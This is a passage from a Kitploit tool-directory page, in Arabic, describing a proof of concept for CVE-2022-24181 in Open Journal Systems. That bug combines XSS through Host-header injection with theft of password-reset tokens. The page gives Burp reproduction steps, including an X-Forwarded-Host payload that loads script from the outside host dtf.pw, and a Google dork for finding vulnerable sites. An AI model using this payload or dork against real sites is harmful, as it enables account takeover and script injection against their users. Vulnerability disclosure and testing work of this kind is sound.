Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/cyberhawk000/cve-2022-24181
الاستطلاعتحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubcyberhawk000/cve-2022-24181

CVE-2022-24181

XSS عبر حقن Host Header وسرقة رمز إعادة تعيين كلمة المرور لمستخدم آخر

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-24181 و CVE-2022-26616. كلاهما ربما متطابقان

ثغرة في Open-journal-system

XSS عبر حقن رأس المضيف وسرقة رمز إعادة تعيين كلمة المرور لمستخدم آخر خطوات إعادة الإنتاج:

  1. اذهب إلى هذا الموقع: https://who's-using-ojs-software.com
  2. وقم بالتقاط هذا الطلب في Burp، وأرسله إلى Repeater.
  3. أضف هذا بعد رأس المضيف: X-Forwarded-Host: foo"><script src=//dtf.pw/2.js><x=".com
  4. ثم انقر على إرسال، بعد ذلك انقر بزر الماوس الأيمن على الطلب وانقر على عرض الرد في المتصفح، ثم انسخ الطلب.
  5. الصق هذا الطلب في المتصفح، وسترى نافذة XSS منبثقة. التخفيف: التحديث إلى إصدار أحدث.

Google Dork للعثور على هذه الثغرة intitle:ojs هذه الثغرة في برنامج PKP التابع للبائع Open-journal-system من الإصدار 2.4.8 إلى 3.3.8 جميعها عرضة لـ XSS عبر حقن رأس المضيف وثغرة سرقة رمز إعادة تعيين كلمة المرور.

تنزيل الأداة
CVE-2022-24181 — XSS عبر حقن Host Header وسرقة رمز إعادة تعيين كلمة المرور لمستخدم آخر | Kitploit